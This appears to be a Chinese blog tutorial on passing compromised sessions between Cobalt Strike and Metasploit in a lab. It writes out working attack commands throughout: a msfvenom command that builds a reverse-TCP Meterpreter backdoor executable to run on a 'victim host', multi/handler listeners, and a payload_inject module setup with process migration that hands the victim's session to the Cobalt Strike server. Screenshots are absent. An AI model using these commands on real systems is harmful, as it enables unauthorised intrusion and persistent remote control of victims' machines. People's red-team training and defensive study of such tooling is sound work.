首页 > 其他分享 >CS与MSF联动

CS与MSF联动

时间:2022-11-11 10:44:42浏览次数:67  
标签:set MetasploitFramework 会话 联动 CobaltStrike CS MSF

0x01 CS与MSF

CobaltStrike(简称CS)是一款美国Red Team开发的渗透测试神器。Armitage是一个MetasploitFramework(简称MSF)的图形化界面工具,而Cobaltstrike大家可以理解其为Armitage的商业版。

早期版本CobaltSrtike依赖MetasploitFramework框架,而现在CobaltStrike已经不再使用MetasploitFramework而是作为单独的平台使用,它分为客户端(Client)与服务端(Teamserver),服务端是一个,客户端可以有多个,团队可进行分布式协团操作。

CobalStrike 与 MetasploitFramework 均是渗透测试中不可缺少的利器,各有所长。前者更适合做稳控平台,后者则更擅长内网各类探测搜集与漏洞利用。两者更需要灵活的联动,各自相互依托,从而提升渗透的效率。

0x02 CS传递会话到MSF

为了方便演示操作,将CS的服务端与MSF服务都设置在同一个IP上。

1. CS操作

先在CobaltStrike上新建一个监听器(Beacon HTTP)

 

 

 

这里的IP端口号指CS服务端

利用CobaltStrike生成一个后门文件

 

 

 将后门文件放在受害主机中执行,之后受害主机就会上线到CS了

 

 

 

至此,CobaltStrike获得到了一个会话

2. MSF操作

在MetasploitFramework上开启一个meterpreter监听(reverse_http),用于接收CobaltStrike传递过来到会话

use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set lhost 192.168.158.129   # msf所在主机的ip
set lport 4444     # msf所在主机自定义端口号
run

 

 

 

3. 会话传递

先在CobaltStrike上创建一个监听(Foreign HTTP),IP 和 端口号需要与MetasploitFramework中设置监听的保持一致

 

 

 然后在CobaltStrike上选中要传递到会话,点击右键选择增加会话(Spawn) ,再选择刚刚创建的监听(Foreign HTTP)

 

 

 

 

 

 上述步骤完成后,在MetasploitFramework中就可以看到CobaltStrike传递过来到会话了

 

 

 

0x03 MSF传递会话到CS

1. CS操作

在CobaltStrike上新建一个监听器(Beacon HTTP)

 

 

 

2. MSF操作

先通过msfvenom生成后门文件

msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=192.168.158.129 LPORT=7777 -f exe > msfshell.exe

  

这里的IP端口号指MSF服务所在主机

使用msfconsole启动MetasploitFramework,设置meterpreter监听用于接收后门文件反弹到shell

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.158.129 # msf所在主机的ip
set lport 7777 # msf所在主机自定义端口号,与后门文件中的一致
run

将后门文件放置受害主机运行后,MetasploitFramework上会获得一个meterpreter的shell

 

 

 

3. 会话传递

将获取到的MetasploitFramework会话挂至后台,会看到一个会话sessions id

background

调用 payload_inject 模块,将指定会话session id注入到新到CobaltStrike会话中

use exploit/windows/local/payload_inject
set payload windows/meterpreter/reverse_http
set lhost 192.168.158.129   # CS服务端IP
set lport 80       # CS服务端监听的端口号
set DisablePayloadHandler True
set PrependMigrate True
set session 4  # 会话id
run

 

 上述步骤完成后,在CobaltStrike中就可以看到MetasploitFramework传递过来到会话了

 

 

参考文章

标签:set,MetasploitFramework,会话,联动,CobaltStrike,CS,MSF
From: https://www.cnblogs.com/1008612mrzou/p/16879790.html

相关文章

  • css中z-index层级
    1.z-index简介(1)概念z-index属性指定了元素与元素之间的z轴上的顺序,而z轴决定元素之间发生覆盖的层叠关系。(2)属性值1.默认auto为什么元素添加定位属性(不包括sta......
  • [题解] [CSP-J 2022] 逻辑表达式 思路整理
    标签:分治。题目传送门:P8815[CSP-J2022]逻辑表达式题目大意给一个包含0、1、|、&、(、)的逻辑表达式(保证正确)。在计算表达式时采用“短路”策略:计算表达式a&b......
  • Prometheus + Grafana(十)系统监控之Elasticsearch
    前言根據 Promtheus上的ExportersandIntegrations頁面 所載,Prometheus有釋出給Elasticsearch所用的exporter,也就是 elasticsearch_exporter 。 本文即是......
  • simpread-(128 条消息) Three.js 模型隐藏或显示_郭隆邦技术博客的博客 - CSDN 博客_t
    Three.js模型隐藏或显示材质属性.visible查看Three.js文档的基类Material,可以知道材质属性.visible的作用就是控制绑定该材质的模型对象是否可见,默认值是true,LineBasi......
  • 考csp的小女孩
    “再多复习一个数据结构吧。”小女孩脑袋里想着splay,在考场外孤苦伶仃地站着,周围的人熙熙攘攘,他们都有说有笑,仿佛做足了准备,只有这个考csp的小女孩因紧张而瑟瑟发抖。进考......
  • CSS通过Flex实现上标
    效果图Code<!DOCTYPEhtml><htmllang="en"><head><metacharset="UTF-8"><metahttp-equiv="X-UA-Compatible"content="IE=edge"><metaname="view......
  • CSP 2022
    终于考完期中了QAQJA不会。B把两个式子联立后消元解二次方程。C把表达式树弄出来之后找最浅的确定节点。D先排序,令\(f_{i,j}\)表示以点\(i\)结尾花费\(j\)......
  • CSS导航栏最后一个元素居右(.nav-site .nav-right{margin-left: auto;}
    效果如图Code<!DOCTYPEhtml><htmllang="en"><head><metacharset="UTF-8"><metahttp-equiv="X-UA-Compatible"content="IE=edge"><metaname="vi......
  • 学习笔记 之 简单了解有关 CSS 那点事儿
    LZ-Says:调整心态,多读书,丰富内心,提升个人文化底蕴。前言前几天,初步了解了下HTML相关的知识点,在学习回顾时,还好,大部分都在,只是新增了一些其他内容,例如自适应等等。上手......
  • css
        ......